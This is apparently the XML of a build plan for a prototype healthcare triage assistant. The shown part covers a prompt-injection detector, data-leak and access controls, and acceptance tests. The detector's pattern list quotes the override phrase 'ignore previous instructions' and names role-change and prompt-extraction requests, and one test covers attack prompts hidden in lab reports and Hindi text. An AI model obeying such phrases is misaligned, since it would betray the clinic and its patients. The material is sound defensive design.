        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious pattern recognition (Sentinel)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Normalize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> text: standard Unicode form, remove invisible characters, decode obvious encoded text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Match</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> against the pattern list: override phrases ("ignore previous instructions"), role-change phrases, requests to reveal system text, requests to prescribe or diagnose, tool-call-looking text, links, and long encoded blobs. Include Hindi and regional-language versions, including romanized forms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Structure check:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> sentences written as commands inside fields that should hold only numbers or lab names.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Score:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> low passes, medium triggers the cheap LLM judge, high is blocked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Action:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the dangerous span is replaced with a marker and the case is flagged to the reviewer. A critical hit blocks the input and logs an alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Security: Preventing Leaks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Passwords stored hashed with bcrypt, and short-lived access tokens (about 15 minutes) with a refresh token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Tokens carry user, role, facility, and a unique ID. A blocklist table supports logout and revocation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Account lockout after repeated failed logins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Roles: health worker, nurse, doctor or medical officer, and admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Facility scoping: users only see cases from their own facility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Object-level check on every case request, so changing an ID in the address cannot expose another case.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The admin sees the audit log only, never patient content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Stopping data from leaving</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Egress guard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the LLM Gateway: only redacted text may be sent. The guard re-scans every outgoing payload for personal identifiers and blocks the call if any are found.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Only the three approved provider domains can be contacted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Raw audio, images, and documents never leave the machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Each case is processed in isolation. No memory or context is shared across patients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Outgoing calls log only provider, model, token counts, and a payload fingerprint, never the content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Sensitive fields are encrypted at rest with a key held in the environment, and HTTPS is used in transit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The vector index contains public guidelines only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploaded files are deleted after extraction. Case data is purged after the retention period, and the delete endpoint works on demand.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Sandboxing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploads are checked by file signature (not just the name) and by size and page limits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Files are re-rendered as plain images so hidden scripts, macros, and metadata are stripped.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">OCR runs in a separate process with time and memory limits, no network access, and a read-only file system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Containers run as a non-root user with secrets passed as environment secrets, never baked into images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">API hardening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Strict input validation, size limits, rate limits per user and per IP, a restricted list of allowed origins, and security headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Responses use whitelisted fields only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Errors to the client are generic. Details go to internal logs only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Logs contain IDs, hashes, and counts. They never contain patient text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">LLM-specific</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools are read-only, and each agent has its own tool allowlist and call cap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Prompts never contain secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The system never depends on hiding its own prompt for safety.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit and secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Append-only, hash-chained audit log of every view, edit, override, approval, tool call, and external call.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Keys live only in environment variables. A pre-commit check blocks secrets from being committed, and any leaked key is rotated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Honest limits.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is a prototype with synthetic data. Real patient use would require on-premise models, legal review, and data-localization compliance. English-only name detection is weaker for Indian-language text, so the plan relies on pattern redaction, a gazetteer, and the rule that only English redacted text leaves the machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Dependency Updates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Add these to the earlier requirements.txt: google-genai, groq, tenacity (retries), slowapi (rate limits), filetype (file signature check), and pyyaml. Sarvam is called through plain HTTP requests, so no extra package is needed. Confirm package names on install day.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">12. Definition of Done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The build is complete only when all of these pass:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">All 12 backend files, the prompts, rule packs, dashboard, tests, and container files exist and run together.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">A synthetic case runs through all 15 agents and reaches the review pause with a full Triage Note.</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Duplicate test:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> killing the process mid-run and retrying produces no repeated alerts, reminders, or audit entries.</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Failure test:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with each provider switched off in turn, the case still completes in degraded mode.</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Leak test:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> seeded fake names, phone numbers, and Aadhaar numbers never appear in outgoing payloads, logs, or API responses.</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Injection test:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> at least 50 attack prompts, including ones hidden inside lab reports and in Hindi, are blocked or ignored.</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Access test:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a user from another facility or role cannot read, change, or delete a case.</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Safety test:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> no output contains diagnosis, treatment, or drug-dose language, and every output carries the disclaimer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Quality metrics:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> report extraction accuracy per language and Red-case recall (the key safety number).</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Educational prototype, triage support only.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7"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve">Triage Assistant: Full Backend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3"/>
      </w:pBd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Healthcare Triage Assistant - Full Backend Build Plan</dc:title>
  <dc:creator>Claude</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-06T19:09:31.397Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-06T19:09:31.408Z</dcterms:modified>
</cp:coreProperties>
</file>

